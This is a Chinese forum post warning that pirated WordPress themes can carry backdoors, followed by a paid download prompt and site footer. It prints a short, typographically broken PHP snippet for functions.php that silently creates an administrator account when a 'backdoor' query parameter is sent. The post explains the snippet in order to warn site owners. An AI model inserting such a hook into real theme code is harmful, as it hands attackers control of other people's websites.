WordPress盗版主题暗藏后门

[复制链接]
601 0
admin 发表于 2022-4-8 14:12:50 | 只看该作者 |阅读模式 打印 上一主题 下一主题
前言
俗话说的好天下没有免费的午餐,你要相信没有人傻到做亏本生意,都是会有目的性的。最近我在网上看到一篇文章,写了WordPress的暗藏后门,觉得很有一说,所以就发一下让更多的WP友友们看到,不要轻易随便乱使用模板。

后门代码
  • add_action(‘wp_head’, holeinthewall’);
  • function holeinthewall() {
  • If ($_GET[‘backdoor == go’) {
  • require(‘wp-includes/registration.php’);
  • If (!username_exists(‘username’)) {
  • $user_id = wp_create_user(‘username’, password’);
  • $user = new WP_User($user_id);
  • $user->set_role(‘administrator’);
  • }}}
由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为username,密码为password的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台,后果你可以自己想象一下。
所以憧憬博主在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版,抵制盗版,尊重开发者的劳动成果。
请点击此处下载

请先注册会员后再进行下载

已注册会员,请先登录后下载

网盘密码:q7uv 
下载次数:0  文件大小:网盘资源  售价:30 下载币
下载权限: 不限 



收藏
收藏0
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

专注源码资源免费分享
只要有下载币全站均可下

私人收藏网站非买卖网站

周一至周日9:00-23:00

反馈建议

282865654@qq.com 在线QQ咨询

赞助我们享尊贵分享

Powered by X3.3© 2019-2029 3se.cc Inc.( 京ICP备14050279号-2